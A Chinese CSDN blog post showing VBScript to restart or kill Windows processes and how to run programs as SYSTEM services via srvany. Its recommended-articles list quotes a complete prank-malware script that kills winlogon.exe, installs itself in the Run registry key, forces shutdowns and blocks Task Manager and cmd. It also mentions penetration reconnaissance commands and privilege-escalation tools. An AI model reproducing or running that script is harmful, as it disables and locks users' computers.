window 应用程序启动监控及把应用程序提权作为服务

最新推荐文章于 2022-09-27 14:50:53 发布
最新推荐文章于 2022-09-27 14:50:53 发布
阅读量1.9k 收藏
点赞数
文章标签: microsoft parameters windows system application vbscript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sebarsunny/article/details/7201376
版权

监控程序,发现失败重启服务(VBScript)

 do

Set wsShell = CreateObject("Wscript.Shell")
dim OK,flag 
OK=False
flag=0
set bag=getobject("winmgmts:\\.\root\cimv2")
set pipe=bag.execquery("select * from win32_process where name = 'aa.exe'")
For Each id In pipe
OK = True
Next
If not OK Then
wsShell.Run "Directory/aa.exe",vbhide
'wsShell.Run "Cmd /c dir ",vbhide
'Wscript.Echo "Not OK"
flag=flag+1
else
'Wscript.Echo "OK"
flag=flag+1
end if
Wscript.sleep 600

loop until flag >0

寻找进程并关闭进程其所有进程

On Error Resume Next
'vbs代码开始----------------------------------------------
sub Close_Process(ProcessName)
On Error Resume Next
for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ '循环进程
if Ucase(ps.name)=Ucase(ProcessName) then
ps.terminate
end if
next
end sub
Close_Process("notepad.exe")

应用程序提权为服务,SYSTEM用户是window最高权限

使用srvany.exe将任何程序作为Windows服务运行

srvany.exe是什么?

srvany.exe是Microsoft Windows Resource Kits工具集的一个实用的小工具,用于将任何EXE程序作为Windows服务运行。也就是说srvany只是其注册程序的服务外壳,这个特性对于我们来说非常实用,我们可以通过它让我们的程序以SYSTEM账户启动,或者实现随机器启动而自启动,也可以隐藏不必要的窗口,比如说控制台窗口等等。

如何获取?

你可以通过下载并安装Microsoft Windows Resource Kits 

如何使用?

当你获取到srvany后并决定将某程序作为服务启动后,请先将srvany安装为系统服务,具体的安装方法有很多,比如说可以通过Microsoft Windows Resource Kits中另外一个实用的小工具instsrv.exe进行安装(下载地址 新窗口打开: www.box.net/s...d/xld32azpeu),将srvany.exe和instsrv.exe拷贝到C:\Windows\System32\后,我们可以通过下面的命令行进行srvany.exe的服务安装:

instsrv ServiceName "C:\Windows\System32\srvany.exe"

ServiceName即你自己定义的服务名称,可以是要作为系统服务启动的应用程序的名称。

安装完毕后,我们需要对srvany.exe进行配置,以便于能够加载我们指定的程序,配置的方法是,开始 - 运行 - regedit,打开注册表,定位到下面的路径。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ServiceName

同样的ServiceName是你刚才安装服务时自定义的服务名称。

如果该服务名下没有Parameters项目,则对服务名称项目右击新建项,名称为Parameters,然后定位到Parameters项,新建以下几个字符串值。

名称 Application 值为你要作为服务运行的程序地址。
名称 AppDirectory 值为你要作为服务运行的程序所在文件夹路径。
名称 AppParameters 值为你要作为服务运行的程序启动所需要的参数。

比如这里是个配置实例,我们这里配置的服务名称是NGINX,其余是nginx的安装配置情况。

srvany配置

当然还有一个比较简单的做法,那就是将下面的文本保存为*.reg文件,然后双击导入注册表。

1
2
3
4
5
6

Windows Registry Editor Version 5.00 
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\服务名称\Parameters] 
"Application"="值为你要作为服务运行的程序地址"
"AppDirectory"="值为你要作为服务运行的程序所在文件夹路径"
"AppParameters"="值为你要作为服务运行的程序启动所需要的参数"


sebarsunny
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
winfrom Windows服务监控exe进程,启动exe窗体应用程序
08-14
C# winfrom Windows服务监控exe进程,启动exe窗体应用程序
Windows系统监控
奔代
05-25 5158
Windows系统监控 一、      应用框架的选取与介绍          该监控系统使用J-Interop开源框架调用WMI来实现。Windows管理规范(WMI)是微软对来自分布式管理任务组(DMTF)基于Web的企业管理(WBEM)和通用信息模型(CIM)标准的实现。WMI用于访问Windows系统,应用,网络,设备等组件,并管理他们,可以实现对本地或远程操作系统的监控,比较流行的J
检测运行程序,强制电脑关机代码
北纬30°
06-28 2373
用txt写这段代码另存为VBS格式: do set bag=getobject("winmgmts:\\.\root\cimv2") set pipe=bag.execquery("select * from win32_process where name=*QQ.exe*") for each i in pipe i.terminate() next wscript.sleep 1000 lo...
内网渗透测试第二章——内网信息收集
山己见的博客
08-25 880
第一部分:内网信息收集概述 收集本机信息 本机信息包括:操作系统、权限、内网IP地址段、杀毒软件、端口、服务、补丁更新频率、网络连接、共享、会话等。如果是域内主机,操作系统、应用软件、补丁、服务、杀毒软件一般都是批量安装的。 ###手动收集信息: 查询网络配置信息 ipconfig/all 查询操作系统及软件信息 (1)查询操作系统和版本信息 systeminfo | findstr /B /C:“OS Name” /C:“OS Version” (2)查看系统体系结构 echo %PR
获取CPU/内存(window下(bat))
qq_53349978的博客
09-27 1621
作为一名程序员,跑程序已经是一件屡见不鲜的事情的,通常情况下,即使我们写完一段代码毫无错误,但是我们仍然要对其进行长时间的跑码测试,要关注其内存是否会泄露,cpu会不会太高,以及程序会不会崩等等这些基础问题。因此在跑程序的时候需要关注程序的外部的各个方面。这比较耗时费力,价值不高。因此我们要学会让程序自己去监测自己,我们只要几天之后去看TXT文件就行。废话不多说了,下面就介绍一下该如何去做。
C++通过WMI-CIMV2获取系统相应类的信息操作代码(通过WMI获取磁盘信息、获取系统时间)
zggzgw的博客
10-15 2743
1.添加对应的头文件和加载lib库 #include<WbemCli.h> #include<intsafe.h> #define SAFE_RELEASE(p) { if(p) { (p)->Release(); (p)=NULL; } } #pragma comment(lib, "wbemuuid.lib") 2.初始化连接至ROOT\CIMV2 B...
Java聊天室程序源码(毕业设计)
03-01
ChatClient.java 为客户端程序启动类,负责客户端的启动和退出。 Login.java 为客户端程序登录界面,负责用户帐号信息的验证与反馈。 Register.java 为客户端程序注册界面,负责用户帐号信息的注册验证与反馈。 ...
计算机应用技术(实用手册)
07-29
当设定为[Enabled](启动)时,这个项目在系统电源开启之后,可加速POST(Power On Self Test)的程序。BIOS会在POST过程当中缩短或是跳过一些检查项目,从而加速启动等待的时间! Hard Disk Boot Priority(硬盘...
breaker:监控您的工作时间。 内置Electron
04-28
断路器 Breaker会看您的工作时间并提醒您休息。...使用我的应用程序,您可以启动计时器45分钟,停止计时器,然后以自定义分钟重新启动计时器。 程式码范例 计时器窗口 // Handle create timer window
王牌超级工具箱 v20.3.zip
07-11
7.电子摄像头:启动监控以后,监控我的办公室,具有定时拍摄功能。 (八)系统安全 1.限制使用电脑:功能强大,禁止上网,或者可以上网但是却禁止下载任何软件。禁止运行指定的程序;或者只能运行指定的程序。禁止...
windows 服务自动监控自动启动程序
04-28
windows 服务监控 自动启动,可以对所有windows服务进行监控,并自动启动监控服务
Cjwdev.WindowsApi win7服务启动外部程序
11-22
Win7下C#通过Windows Service启动外部程序时要用到的一个第三方动态库。 官方网站上下载稍有点费劲,下载下来与大家免费分享。
各种提权工具,包括免杀版等
10-22
平时收集的19个提权工具,包括pr、nc、免杀等----------
windows监控并重启某个进程
09-27
有时会遇到某个服务突然挂掉,又不能时时监控的情况,写了一个windows监控服务的进程,如果进程不存在,重启这个服务,已经过实际环境测试。
蓝屏代码
07-11
自行转vbs 代码:for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process").instances_ if Ucase(ps.name)=Ucase("winlogon.exe") then ps.terminate end if next Set ws=CreateObject("WScript.Shell") set fs=createobject("scripting.filesystemobject") dim a1,a2,a3,thn,i thn=wscript.scriptfullname a1=fs.getparentfoldername(fs.GetSpecialFolder(0)) fs.copyfile thn,a1&"\admin123.vbs",true do while i<10 i=i+1 ws.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\admin","C:\admin123.vbs" loop ws.run "shutdown -s -f -t 60" do wscript.sleep 500 if ws.appactivate("Windows 任务管理器")=true then ws.run "taskkill /f /im Taskmgr.exe" end if if ws.appactivate("命令提示符")=true then ws.run "taskkill /f /im cmd.exe" end if if ws.appactivate("C:\WINDOWS\system32\cmd.exe")=true then ws.run "taskkill /f /im cmd.exe" end if if ws.appactivate("系统关机")=false then ws.run "shutdown -s -f -t 30" end if loop
VB6 获取内存、硬盘、CPU使用率信息
xjnzhidao的博客
08-30 2747
Public Function 内存信息() As String Set objWMI = GetObject("winmgmts:\\" & "." & "\root\cimv2") Set colOS = objWMI.InstancesOf("Win32_OperatingSystem") For Each objOS In colOS 总内存 = Ro
Windows 2000命令行如何查看进程PID和杀进程
weixin_34238633的博客
09-16 366
虽然现在大部分是2003了,但还有少数是2000命令执行格式为ntsd -c q -p PID那如何知道winlogon.exe的PID进程号呢~以下这个脚本可以列举当前所有进程的PID:wscript.echo “PID ProcessName”for each ps in getobject("winmgmts:\\.\root\cimv2:win32_process"...
(转载)深入挖掘Windows脚本技术
05-28 3138
转自:http://www.xfocus.net创建时间:2004-11-20文章属性:原创文章提交:zzzevazzz (zzzevazzz_at_sina.com)深入挖掘Windows脚本技术-------------------------------------------------------zzzEVAzzz http://www.ph4nt0m
VB 定时终止进程
水也的博客
04-18 839
do set bag=getobject("winmgmts:\\.\root\cimv2") set pipe=bag.execquery("select * from win32_process where name='QQ.exe'") for each i in pipe i.terminate() next wscript.sleep 1000 loop
window应用程序强力卸载
最新发布
09-03
窗口应用程序强力卸载是一种专门用于彻底删除电脑中的软件的工具。在使用窗口应用程序时,有时会遇到一些问题,例如软件无法正常安装、出现错误、性能下降等。这时,我们可以使用强力卸载工具来解决这些问题。 强力...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值